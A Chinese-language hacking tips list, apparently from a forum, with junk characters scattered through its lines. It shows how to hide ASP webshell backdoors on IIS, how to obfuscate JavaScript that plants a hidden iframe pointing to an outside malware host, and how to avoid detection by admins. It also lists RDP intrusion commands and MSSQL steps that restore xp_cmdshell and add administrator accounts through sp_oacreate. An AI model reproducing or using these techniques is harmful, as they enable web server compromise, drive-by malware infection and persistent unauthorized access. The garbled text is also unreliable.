% B1 g& y( f. b! p, C用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。7 O' W/ h! r, _ y9 Z
0 A- ~/ ] V1 U
53、隐藏ASP后门的两种方法
8 O2 r: F4 L. k" m4 j/ Y1、建立非标准目录:mkdir images..\
0 N. u. \4 R" u+ ?( k拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
* Z, x, { q1 n通过web访问ASP木马:http://ip/images../news.asp?action=login
1 g" Q, w {+ I# c% ]5 Y: H如何删除非标准目录:rmdir images..\ /s
4 F8 c; ]3 M M8 |' k5 C2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
3 g7 e# N; J: s4 f) @mkdir programme.asp& V% h+ |4 w4 c( b5 N4 G2 z
新建1.txt文件内容:<!--#include file=”12.jpg”-->
& _& e+ \+ F; z- k6 b新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件9 F- g5 Z- e8 z0 B. ` q0 G& o2 s7 P
attrib +H +S programme.asp
3 W1 S* `% N* Z. u! W# i通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt+ s% E9 N7 L! Y4 p
& P* l! Q, f5 [54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
A+ |5 V# x; {( e8 b- \# I/ _9 Q然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
6 ?4 s& I$ l% L5 k. k
: {5 }; E) k$ U$ j5 v/ N55、JS隐蔽挂马
+ m$ l3 Y n$ @7 k1.; N# L8 \7 d T! x0 S& J' D
var tr4c3="<iframe src=ht";8 Q. z* @6 \% G0 q a
tr4c3 = tr4c3+"tp:/";
. ^/ A9 t& x) L |8 a" B+ f2 {tr4c3 = tr4c3+"/ww";
f6 w( J* V8 p5 `# M* btr4c3 = tr4c3+"w.tr4";
$ D' R; W6 W6 @( ztr4c3 = tr4c3+"c3.com/inc/m";9 e$ Q8 H% u3 Z7 r" N# @
tr4c3 = tr4c3+"m.htm style="display:none"></i";6 R; I! C" K8 O, N a3 ^
tr4c3 =tr4c3+"frame>'";* d1 o) T3 P/ J2 E3 B8 q/ `8 G8 ~6 A
document.write(tr4c3);
: O0 G0 w8 v6 @' W. }. |% D5 ^避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
- `% h. y3 O7 r5 O, E n, B' b: ?0 @0 O# g3 G
2.
+ L! |7 ^3 J% O转换进制,然后用EVAL执行。如9 g. Z8 _, V& B! c" ~$ h
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
& C7 ]( o1 G( s5 |9 }& k1 K0 E不过这个有点显眼。
3 y. [) L0 g# r, f, d7 L: x3.- J- a$ |6 z5 P6 e! {, C5 }; y
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
6 V1 \- J- @. @2 D8 x/ p3 o最后一点,别忘了把文件的时间也修改下。
8 P; R6 D- O/ @, a
* b2 s/ J) D6 c7 q8 C56.3389终端入侵常用DOS命令% {% Y4 V4 T8 d' F- a! S3 y$ J) v0 g
taskkill taskkill /PID 1248 /t
: |2 U4 y" x) ?9 o$ Y- @/ I" p! F; J9 m- I( t6 f
tasklist 查进程7 m. N+ E; v9 F0 @7 R4 H1 N
5 A+ ]- X" f% o5 k5 p# kcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
- g! R8 Z! ?5 v4 J! aiisreset /reboot2 G: j5 X ]1 n% E. f# {* I8 O
tsshutdn /reboot /delay:1 重起服务器
# x! [3 w% k+ k/ ]7 Q' {- p# k
$ M# Q( D z4 ^% G6 q2 Ologoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 }6 k' d- n N. y) J
' P. E8 ] S2 j( v* N; Dquery user 查看当前终端用户在线情况
+ t3 o( @& X0 c6 F5 b- N& p. }
$ f- h, t. |+ A4 @7 W0 B. K+ d要显示有关所有会话使用的进程的信息,请键入:query process *9 S/ W2 U% }. E* J2 ?
z' K3 I+ M" i+ y# c6 X
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
. J0 u* J+ F+ ~# Z, m2 j8 q: h* M% r$ O8 D
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2! c* u4 M K3 u) E. ~
7 i; G& J3 k8 B& h% v要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM029 n* ~9 s' G1 V6 }9 k! R
( ~2 ?. s% ~) u0 n命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
v q U' i% E; J8 D
3 o# l2 H9 d5 G& [命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统: N0 Q3 f4 v; _
6 ?/ x2 \3 |) r6 b" m$ e
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
) Y5 K# b1 _& U- U
7 ~$ _9 A" L8 Y! f& m/ O* h. `+ R. g命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
/ D8 x: ^+ s% R. c# y$ s ~) c+ O; Z+ j; _- \# U; R7 G
56、在地址栏或按Ctrl+O,输入:
5 n m* V3 }4 v, \& n. R+ @% Cjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
* O. m. v) N. `& u: c5 a7 Z
4 h x' K5 u5 B$ `3 ^源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
0 z2 {( K) r& i
8 b; ^0 ~* h5 N e- b6 [57、net user的时候,是不能显示加$的用户,但是如果不处理的话," J! h* \3 ?, v
用net localgroup administrators是可以看到管理组下,加了$的用户的。
2 J# E( u+ k5 \5 m9 l# r/ F6 M& R; v% T/ `$ h. e$ J
58、 sa弱口令相关命令
! W, j- U$ o% c# O9 x$ N6 J- U4 l1 s
一.更改sa口令方法:
/ s, R( [2 O: Q0 N% |$ P# R4 h用sql综合利用工具连接后,执行命令:9 {! v- P8 Q7 E8 k$ L, g3 G
exec sp_password NULL,'20001001','sa'
' U- Q' ~/ y% q1 N, g' g(提示:慎用!)4 y3 c w ^* Q" { l$ m5 i
( x+ o* ` |5 I6 c' h4 V. U! N二.简单修补sa弱口令./ j& k7 r+ M j( L7 s( `3 h) L
% q+ `. D9 U" z- a5 [方法1:查询分离器连接后执行:% Z5 n9 G) J) Q4 s- ?1 S
if exists (select * from" F4 i7 n/ T- G' p
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and: d5 ~: K/ |% g! Q
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)2 W/ x5 E! ^$ n V9 w! U
* R+ j, [+ {2 t4 u* G _4 Texec sp_dropextendedproc N'[dbo].[xp_cmdshell]'7 j2 w% R" F: h0 K# l1 Y
% S0 i& ~( u/ S2 A- n U
GO! l1 b3 _9 C: s" E
( a# L0 Z* X- {- [2 B
然后按F5键命令执行完毕
0 S5 M& j' ^% q* v+ @: ~9 F/ {! C% P# J; p
方法2:查询分离器连接后' D" F* |$ u! Y3 X4 N e% F& ?7 }) t! u4 m* E
第一步执行:use master8 ~* R5 M% o1 r+ a8 V' p
第二步执行:sp_dropextendedproc 'xp_cmdshell'
Y' e! t3 [& p0 n" J) N然后按F5键命令执行完毕
0 ^: N' W& A3 B- e- P
o! }' R- j! o0 v, w* P) B$ o- B" \3 m* Q1 }
三.常见情况恢复执行xp_cmdshell.
# u3 \' x' s2 L+ N1 w" N) l- x- _
! u6 p/ P( a+ g4 K3 j& H: S$ u
1 未能找到存储过程'master..xpcmdshell'.
# y3 R) p8 ?4 g( \ 恢复方法:查询分离器连接后,
9 w3 }; ?$ d3 g2 [第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* e8 ^# e5 B+ A! X: x1 }0 `7 A第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'" ?6 Q+ @! H, ~9 d2 n) Q- j' [
然后按F5键命令执行完毕/ E& t A0 M, j0 v; q, A+ L! N
3 x( I6 `3 Q2 n- B' G4 q" M2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。) _! `1 `$ h$ E* x" { n' L
恢复方法:查询分离器连接后,' t3 B8 w* w) o' r9 ~0 [5 s, K3 B
第一步执行:sp_dropextendedproc "xp_cmdshell"8 N3 X; P' X+ a3 [6 H6 C
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'5 t8 [! Y& l$ q/ _) J: }
然后按F5键命令执行完毕
$ G! b! V3 l0 N6 Z/ |; K# k" q
! V/ q" E2 P8 \9 T$ V, N& B3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) R0 }- G/ [: h% d2 n
恢复方法:查询分离器连接后,
( W! |3 u5 E& u6 a U第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
" j5 E, Y0 I) @% n4 K. I* A: j第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ( H( i) R6 J" A) ?( K. m6 U: n/ ~" J
然后按F5键命令执行完毕
, M. t; r/ J) k E' X% J" Q
) r/ g/ g. {& S. ]9 t/ E四.终极方法.. j1 S) E8 A: a; _2 y: ^! t+ \
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
+ X6 m; ^; {' w% D( K查询分离器连接后,
, d$ N6 S( w9 A3 K; b2000servser系统:
* Z+ Q, l B& ~- d( B7 Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'$ U* F3 S- r% u$ c/ Q
; H7 l& l# j) Q3 a4 e; T& ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 e7 {1 _: z# ?( P
& O4 E$ X! N# K* m# p3 b# Gxp或2003server系统:5 _6 O# l7 Y8 N+ w1 l0 O/ }9 Q) o
; d7 ?3 E+ i4 a0 h6 Q5 Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
; Q T6 B7 Z/ {1 O' T
- `+ N8 P! ]) [) s' z1 l' u! fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
/ I- c9 j' c& Y ^" A$ }+ R+ ^0 A |